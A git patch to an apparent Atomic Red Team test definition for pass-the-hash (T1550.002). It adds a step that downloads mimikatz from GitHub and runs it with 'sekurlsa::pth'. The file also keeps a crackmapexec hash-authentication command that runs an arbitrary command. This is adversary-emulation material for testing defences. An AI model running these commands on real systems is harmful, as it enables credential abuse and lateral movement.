From 5ba2d3e985ff6201b58a9cfe1b0699870167d92e Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Tue, 6 Oct 2020 11:13:14 -0500 Subject: [PATCH] Update T1550.002.yaml (#1235) added code to make prereq commands for test 1. --- atomics/T1550.002/T1550.002.yaml | 21 +++++++++++++++++++-- 1 file changed, 19 insertions(+), 2 deletions(-) diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml index aae952e0..58964500 100644 --- a/atomics/T1550.002/T1550.002.yaml +++ b/atomics/T1550.002/T1550.002.yaml @@ -21,9 +21,26 @@ atomic_tests: description: domain type: string default: atomic.local + mimikatz_path: + description: mimikatz windows executable + type: Path + default: '%tmp%\mimikatz\x64\mimikatz.exe' + dependency_executor_name: powershell + dependencies: + - description: | + Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force executor: command: | - mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} + #{mimikatz_path} sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 @@ -63,4 +80,4 @@ atomic_tests: executor: command: | crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} - name: command_prompt \ No newline at end of file + name: command_prompt